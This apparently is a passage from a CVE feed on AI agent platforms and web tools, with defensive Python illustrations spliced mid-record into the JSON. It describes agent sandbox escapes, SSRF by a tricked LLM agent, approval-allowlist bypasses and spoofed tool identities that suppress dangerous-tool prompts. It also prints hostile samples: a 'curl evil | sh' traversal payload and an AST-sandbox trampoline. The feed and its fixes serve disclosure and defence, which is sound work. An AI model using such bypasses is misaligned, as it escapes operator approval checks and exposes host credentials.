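Added illustration for CVE-2026-40157 (PraisonAI `praisonai recipe unpack`
called tar.extract() on .praison bundles without checking member paths).
This is not PraisonAI's code. The bundles are constructed in memory so the
example runs offline; build_bundle, check_members and safe_extract are names
chosen for this example.
"""
import io
import os
import tarfile
import tempfile
from typing import List, Sequence, Tuple


def build_bundle(members: Sequence[Tuple[str, bytes]]) -> bytes:
    """Constructed sample archive from (name, payload) pairs."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in members:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def check_members(tar: tarfile.TarFile, dest: str) -> List[str]:
    """Names of members that would land outside dest: absolute names,
    `..` components, and symlinks or hardlinks whose target escapes."""
    dest_real = os.path.realpath(dest)
    bad = []
    for m in tar.getmembers():
        target = os.path.realpath(os.path.join(dest_real, m.name))
        if os.path.commonpath([dest_real, target]) != dest_real:
            bad.append(m.name)
            continue
        if m.issym() or m.islnk():
            # symlink targets are relative to the member's directory,
            # hardlink targets to the archive root
            base = os.path.dirname(target) if m.issym() else dest_real
            link = os.path.realpath(os.path.join(base, m.linkname))
            if os.path.commonpath([dest_real, link]) != dest_real:
                bad.append(m.name)
    return bad


def safe_extract(data: bytes, dest: str) -> List[str]:
    """Extract into dest, refusing the whole bundle if any member escapes.
    Returns the extracted member names."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        bad = check_members(tar, dest)
        if bad:
            raise ValueError(f"refusing bundle, traversal in {bad}")
        # Python 3.12+ (and backports in recent 3.8 to 3.11 releases) ship
        # tarfile.data_filter, which rejects the same classes of member.
        # Use it too when present, so both checks would have to be wrong.
        if hasattr(tarfile, "data_filter"):
            tar.extractall(dest, filter="data")
        else:
            tar.extractall(dest)
        return [m.name for m in tar.getmembers()]


def demo() -> dict:
    """A malicious bundle is refused outright; a clean one extracts."""
    dest = tempfile.mkdtemp(prefix="unpack")
    evil = build_bundle([("recipe/agents.yaml", b"agents: []\n"),
                         ("../../.bashrc", b"curl evil | sh\n")])
    clean = build_bundle([("recipe/agents.yaml", b"agents: []\n")])
    with tarfile.open(fileobj=io.BytesIO(evil), mode="r") as tar:
        flagged = check_members(tar, dest)
    try:
        safe_extract(evil, dest)
        refused = False
    except ValueError:
        refused = True
    return {"flagged": flagged, "refused": refused,
            "clean_extracted": safe_extract(clean, dest)}
```

Refusing the whole bundle, rather than skipping the bad member, is deliberate: a bundle with one traversal entry is hostile, and partially extracting it gives the attacker a half-installed recipe to reason about.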
The sandbox relies on AST-based filtering of attribute access but fails to account for dynamic attribute resolution via built-in methods such as type.__getattribute__, resulting in incomplete enforcement of security restrictions. The string '__subclasses__' is an ast.Constant, not an ast.Attribute, so it is never checked against the blocked list. This vulnerability is fixed in 4.5.128.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08603,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3c4r-6p77-xwr7"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40159","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI’s MCP (Model Context Protocol) integration allows spawning background servers via stdio using user-supplied command strings (e.g., MCP(\"npx -y @smithery/cli ...\")). These commands are executed through Python’s subprocess module. By default, the implementation forwards the entire parent process environment to the spawned subprocess. As a result, any MCP command executed in this manner inherits all environment variables from the host process, including sensitive data such as API keys, authentication tokens, and database credentials. This behavior introduces a security risk when untrusted or third-party commands are used. In common scenarios where MCP tools are invoked via package runners such as npx -y, arbitrary code from external or potentially compromised packages may execute with access to these inherited environment variables. This creates a risk of unintended credential exposure and enables potential supply chain attacks through silent exfiltration of secrets. 
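The CVE-2026-40158 entry above pins the bypass on a single AST detail: the blocked names are matched on `ast.Attribute` nodes, and `type.__getattribute__(obj, '__subclasses__')` carries the name as an `ast.Constant` instead. The following is an added Python illustration, not PraisonAI's code: `naive_filter` reproduces the described check, `stricter_filter` extends it to string constants and bare names, and `verdicts` runs both over three constructed samples. The `BLOCKED` set is an assumption modelled on the names the advisory lists; nothing here executes the submitted code, the functions only inspect its AST.

```python
"""Why an ast.Attribute-only denylist is not a sandbox.

Added illustration for CVE-2026-40158 (PraisonAI _execute_code_direct blocks
dunder names only where they appear as ast.Attribute nodes). This is not
PraisonAI's code; naive_filter reproduces the described check and
stricter_filter shows what it misses. BLOCKED is an assumed denylist based on
the names the advisory mentions. Nothing here executes the samples.
"""
import ast
from typing import Dict, Set, Tuple

BLOCKED: Set[str] = {"__subclasses__", "__globals__", "__bases__",
                     "__mro__", "__builtins__", "__import__"}

# Builtins that let code reach attributes without writing them as attributes.
TRAMPOLINES: Set[str] = {"getattr", "type", "vars", "globals", "eval", "exec"}

SAMPLES: Dict[str, str] = {
    # Harmless agent code: nothing in it is on either list.
    "benign": "total = sum(x * x for x in range(10))",
    # Direct attribute walk: caught by the ast.Attribute check.
    "direct": "().__class__.__bases__[0].__subclasses__()",
    # The trampoline from the advisory: '__subclasses__' is an ast.Constant
    # argument to type.__getattribute__, so no ast.Attribute carries it.
    "trampoline": "type.__getattribute__(object, '__subclasses__')()",
}


def naive_filter(src: str) -> bool:
    """True means 'allowed'. Mirrors the flawed check: only attribute names."""
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Attribute) and node.attr in BLOCKED:
            return False
    return True


def stricter_filter(src: str) -> bool:
    """True means 'allowed'. Also inspects string constants and bare names,
    and refuses the reflection builtins outright. Still a denylist: a real
    sandbox needs a separate process with seccomp/namespaces, or a VM."""
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Attribute) and node.attr in BLOCKED:
            return False
        if (isinstance(node, ast.Constant) and isinstance(node.value, str)
                and node.value in BLOCKED):
            return False
        if isinstance(node, ast.Name) and (node.id in BLOCKED
                                           or node.id in TRAMPOLINES):
            return False
    return True


def verdicts() -> Dict[str, Tuple[bool, bool]]:
    """(naive, stricter) verdict for each sample."""
    return {name: (naive_filter(src), stricter_filter(src))
            for name, src in SAMPLES.items()}
```

Even the stricter filter is defeated by building the string at runtime (`'__sub' + 'classes__'`) or by `chr()` arithmetic, which is the point: AST denylists enumerate spellings, and Python has unbounded spellings for the same object.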
This vulnerability is fixed in 4.5.128.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00016,"ranking_epss":0.03363,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pj2r-f9mw-vrcq"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40160","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, web_crawl's httpx fallback path passes user-supplied URLs directly to httpx.AsyncClient.get() with follow_redirects=True and no host validation. An LLM agent tricked into crawling an internal URL can reach cloud metadata endpoints (169.254.169.254), internal services, and localhost. The response content is returned to the agent and may appear in output visible to the attacker. This fallback is the default crawl path on a fresh PraisonAI installation (no Tavily key, no Crawl4AI installed). This vulnerability is fixed in 1.5.128.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.1,"epss":0.00041,"ranking_epss":0.12288,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qq9r-63f6-v542","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qq9r-63f6-v542"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40073","summary":"SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, under certain circumstances, requests could bypass the BODY_SIZE_LIMIT on SvelteKit applications running with adapter-node. This bypass does not affect body size limits at other layers of the application stack, so limits enforced in the WAF, gateway, or at the platform level are unaffected. 
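The CVE-2026-40159 entry above (PraisonAI MCP stdio servers inheriting the whole parent environment) is fixed by building the child's environment from an allowlist rather than from `os.environ`. The following is an added Python illustration, not PraisonAI's code: `minimal_env` is the allowlist builder, `child_env_keys` spawns the current interpreter as a stand-in for an `npx -y ...` tool server and returns the variable names it could see, and `demo` plants two constructed secrets in the parent to compare the inherit-everything default with the scrubbed environment.

```python
"""Spawning a tool subprocess without handing it the parent's secrets.

Added illustration for CVE-2026-40159 (PraisonAI MCP stdio servers spawned
with subprocess inherit the full parent environment). This is not PraisonAI's
code. The child is the current Python interpreter printing its own
environment keys, so the example runs offline; the secret names and values
are constructed. SAFE_ENV_KEYS, minimal_env and child_env_keys are names
chosen for the example.
"""
import json
import os
import subprocess
import sys
from typing import Dict, Iterable, List, Optional

# Variables a stdio tool server legitimately needs. Everything else (API
# keys, DB URLs, cloud credentials) stays with the parent. SYSTEMROOT/TEMP
# are included so the same allowlist works on Windows.
SAFE_ENV_KEYS = ("PATH", "HOME", "LANG", "LC_ALL", "TMPDIR",
                 "SYSTEMROOT", "TEMP", "TMP")


def minimal_env(extra: Optional[Dict[str, str]] = None,
                allow: Iterable[str] = SAFE_ENV_KEYS) -> Dict[str, str]:
    """Child environment from an allowlist plus explicitly passed extras."""
    env = {k: os.environ[k] for k in allow if k in os.environ}
    if extra:
        env.update(extra)
    return env


_CHILD = "import os, json; print(json.dumps(sorted(os.environ)))"


def child_env_keys(env: Optional[Dict[str, str]]) -> List[str]:
    """Spawn a child and return the variable names visible to it.
    env=None reproduces the vulnerable default: inherit everything."""
    proc = subprocess.run([sys.executable, "-c", _CHILD], env=env,
                          capture_output=True, text=True, check=True)
    return json.loads(proc.stdout)


def demo() -> dict:
    # Constructed secrets in the parent, as an agent host would carry.
    os.environ["OPENAI_API_KEY"] = "sk-example-not-real"
    os.environ["DATABASE_URL"] = "postgres://app:hunter2@db/prod"
    inherited = child_env_keys(None)                                # default
    scrubbed = child_env_keys(minimal_env({"MCP_SERVER_PORT": "3000"}))
    return {
        "inherited_leaks_key": "OPENAI_API_KEY" in inherited,
        "scrubbed_leaks_key": "OPENAI_API_KEY" in scrubbed,
        "scrubbed_leaks_db": "DATABASE_URL" in scrubbed,
        "scrubbed_has_extra": "MCP_SERVER_PORT" in scrubbed,
    }
```

An allowlist is the right shape here because the set of secrets a host process carries is open-ended; a denylist of known key names would miss the next one. If a specific MCP server genuinely needs a credential, pass it through `extra` for that server only.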
This vulnerability is fixed in 2.57.1.","cvss":8.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.2,"epss":0.0004,"ranking_epss":0.11969,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/sveltejs/kit/commit/3202ed6c98f9e8d86bf0c4c7ad0f2e273e5e3b95","https://github.com/sveltejs/kit/releases/tag/@sveltejs/kit@2.57.1","https://github.com/sveltejs/kit/security/advisories/GHSA-2crg-3p73-43xp"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40074","summary":"SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, redirect, when called from inside the handle server hook with a location parameter containing characters that are invalid in an HTTP header, will cause an unhandled TypeError. This could result in DoS on some platforms, especially if the location passed to redirect contains unsanitized user input. This vulnerability is fixed in 2.57.1.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.0004,"ranking_epss":0.11969,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/sveltejs/kit/commit/10d7b44425c3d9da642eecce373d0c6ef83b4fcd","https://github.com/sveltejs/kit/releases/tag/@sveltejs/kit@2.57.1","https://github.com/sveltejs/kit/security/advisories/GHSA-3f6h-2hrp-w5wx"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40086","summary":"Rembg is a tool to remove image backgrounds. Prior to 2.0.75, a path traversal vulnerability in the rembg HTTP server allows unauthenticated remote attackers to read arbitrary files from the server's filesystem. 
By sending a crafted request with a malicious model_path parameter, an attacker can force the server to attempt loading any file as an ONNX model, revealing file existence, permissions, and potentially file contents through error messages. This vulnerability is fixed in 2.0.75.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00049,"ranking_epss":0.14902,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/danielgatis/rembg/commit/7c76d3cdc5757ffbda6a76664b24cfbecdb80273","https://github.com/danielgatis/rembg/releases/tag/v2.0.75","https://github.com/danielgatis/rembg/security/advisories/GHSA-3wqj-33cg-xc48"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40097","summary":"Step CA is an online certificate authority for secure, automated certificate management for DevOps. From 0.24.0 to before 0.30.0-rc3, an attacker can trigger an index out-of-bounds panic in Step CA by sending a crafted attestation key (AK) certificate with an empty Extended Key Usage (EKU) extension during TPM device attestation. When processing a device-attest-01 ACME challenge using TPM attestation, Step CA validates that the AK certificate contains the tcg-kp-AIKCertificate Extended Key Usage OID. During this validation, the EKU extension value is decoded from its ASN.1 representation and the first element is checked. A crafted certificate could include an EKU extension that decodes to an empty sequence, causing the code to panic when accessing the first element of the empty slice. This vulnerability is only reachable when a device-attest-01 ACME challenge with TPM attestation is configured. Deployments not using TPM device attestation are not affected. 
This vulnerability is fixed in 0.30.0-rc3.","cvss":3.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08509,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/smallstep/certificates/commit/ffd31ac0a87e03b0224cb8363094bfe602242888","https://github.com/smallstep/certificates/pull/2569","https://github.com/smallstep/certificates/releases/tag/v0.30.0","https://github.com/smallstep/certificates/security/advisories/GHSA-9qq8-cgcv-qmc9"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40100","summary":"FastGPT is an AI Agent building platform. Prior to 4.14.10.3, the /api/core/app/mcpTools/runTool endpoint accepts arbitrary URLs without authentication. The internal IP check in isInternalAddress() only blocks private IPs when CHECK_INTERNAL_IP=true, which is not the default. This allows unauthenticated attackers to perform SSRF against internal network resources. This vulnerability is fixed in 4.14.10.3.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14176,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/labring/FastGPT/security/advisories/GHSA-jrhc-f3j7-f8g4"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35668","summary":"OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. 
Attackers can exploit incomplete parameter validation in normalizeSandboxMediaParams and missing mediaLocalRoots context to access sensitive files including API keys and configuration data outside designated sandbox roots.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":7.1,"epss":0.00041,"ranking_epss":0.12387,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg","https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters"],"published_time":"2026-04-10T17:17:09","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35669","summary":"OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that incorrectly mint operator.admin runtime scope regardless of caller-granted scopes. Attackers can exploit this scope boundary bypass to gain elevated privileges and perform unauthorized administrative actions.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00039,"ranking_epss":0.11579,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe","https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope"],"published_time":"2026-04-10T17:17:09","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35670","summary":"OpenClaw before 2026.3.22 contains a webhook reply delivery vulnerability that allows attackers to rebind chat replies to unintended users by exploiting mutable username matching instead of stable numeric user identifiers. 
Attackers can manipulate username changes to redirect webhook-triggered replies to different users, bypassing the intended recipient binding recorded in webhook events.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":6.0,"epss":0.00075,"ranking_epss":0.2249,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455","https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf","https://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat"],"published_time":"2026-04-10T17:17:09","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35663","summary":"OpenClaw before 2026.3.25 contains a privilege escalation vulnerability allowing non-admin operators to self-request broader scopes during backend reconnect. Attackers can bypass pairing requirements to reconnect as operator.admin, gaining unauthorized administrative privileges.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00039,"ranking_epss":0.11579,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48","https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim"],"published_time":"2026-04-10T17:17:08","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35664","summary":"OpenClaw before 2026.3.25 contains an authentication bypass vulnerability in raw card send surface that allows unpaired recipients to mint legacy callback payloads. 
Attackers can send raw card commands to bypass DM pairing restrictions and reach callback handling without proper authorization.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00057,"ranking_epss":0.1787,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354","https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3","https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks"],"published_time":"2026-04-10T17:17:08","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35665","summary":"OpenClaw before 2026.3.24 contains an incomplete fix for CVE-2026-32011 where the Feishu webhook handler accepts request bodies with permissive limits of 1MB and 30-second timeout before signature verification. An unauthenticated attacker can exhaust server connection resources by sending concurrent slow HTTP POST requests to the Feishu webhook endpoint, blocking legitimate webhook deliveries.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00058,"ranking_epss":0.18045,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v","https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing"],"published_time":"2026-04-10T17:17:08","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35666","summary":"OpenClaw before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to unwrap /usr/bin/time wrappers. 
Attackers can bypass executable binding restrictions by using an unregistered time wrapper to reuse approval state for inner commands.","cvss":7.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":7.7,"epss":0.00046,"ranking_epss":0.13914,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4","https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper"],"published_time":"2026-04-10T17:17:08","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35667","summary":"OpenClaw before 2026.3.24 contains an incomplete fix for CVE-2026-27486 where the !stop chat command uses an unpatched killProcessTree function from shell-utils.ts that sends SIGKILL immediately without graceful SIGTERM shutdown. Attackers can trigger process termination via the !stop command, causing data corruption, resource leaks, and skipped security-sensitive cleanup operations.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":6.9,"epss":0.00013,"ranking_epss":0.02048,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2","https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts"],"published_time":"2026-04-10T17:17:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35658","summary":"OpenClaw before 2026.3.2 contains a filesystem boundary bypass vulnerability in the image tool that fails to honor tools.fs.workspaceOnly restrictions. 
Attackers can traverse sandbox bridge mounts outside the workspace to read files that other filesystem tools would reject.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.0,"epss":0.00033,"ranking_epss":0.09524,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/14baadda2c456f3cf749f1f97e8678746a34a7f4","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2","https://github.com/openclaw/openclaw/commit/dd9d9c1c609dcb4579f9e57bd7b5c879d0146b53","https://github.com/openclaw/openclaw/security/advisories/GHSA-cfp9-w5v9-3q4h","https://www.vulncheck.com/advisories/openclaw-filesystem-boundary-bypass-in-image-tool"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35659","summary":"OpenClaw before 2026.3.22 contains a service discovery vulnerability where TXT metadata from Bonjour and DNS-SD could influence CLI routing even when actual service resolution failed. 
Attackers can exploit unresolved hints to steer routing decisions to unintended targets by providing malicious discovery metadata.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":5.1,"epss":6e-05,"ranking_epss":0.00406,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569","https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv","https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35660","summary":"OpenClaw before 2026.3.23 contains an insufficient access control vulnerability in the Gateway agent /reset endpoint that allows callers with operator.write permission to reset admin sessions. 
Attackers with operator.write privileges can invoke /reset or /new messages with an explicit sessionKey to bypass operator.admin requirements and reset arbitrary sessions.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":7.2,"epss":0.0004,"ranking_epss":0.12059,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f","https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35661","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Telegram callback query handling that allows attackers to mutate session state without satisfying normal DM pairing requirements. Remote attackers can exploit weaker callback-only authorization in direct messages to bypass DM pairing and modify session state.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00038,"ranking_epss":0.11396,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065","https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33","https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35662","summary":"OpenClaw before 2026.3.22 fails to enforce controlScope restrictions on the send action, allowing leaf subagents to message controlled child sessions beyond their authorized scope. 
Attackers can exploit this by using the send action to communicate with child sessions without proper scope validation, bypassing intended access control restrictions.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07804,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0","https://github.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w","https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35653","summary":"OpenClaw before 2026.3.24 contains an incorrect authorization vulnerability in the POST /reset-profile endpoint that allows authenticated callers with operator.write access to browser.request to bypass profile mutation restrictions. 
Attackers can invoke POST /reset-profile through the browser.request surface to stop the running browser, close Playwright connections, and move profile directories to Trash, crossing intended privilege boundaries.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":7.2,"epss":0.0005,"ranking_epss":0.15322,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0","https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a","https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r","https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35654","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Microsoft Teams feedback invokes that allows unauthorized senders to record session feedback. Attackers can bypass sender allowlist checks via feedback invoke endpoints to trigger unauthorized feedback recording or reflection.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00028,"ranking_epss":0.07805,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea","https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35655","summary":"OpenClaw before 2026.3.22 contains an identity spoofing vulnerability in ACP permission resolution that trusts conflicting tool identity hints from rawInput and metadata. 
Attackers can spoof tool identities through rawInput parameters to suppress dangerous-tool prompting and bypass security restrictions.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":6.9,"epss":0.00039,"ranking_epss":0.117,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60","https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj","https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35656","summary":"OpenClaw before 2026.3.22 contains an authentication bypass vulnerability in the X-Forwarded-For header processing when trustedProxies is configured, allowing attackers to spoof loopback hops. 
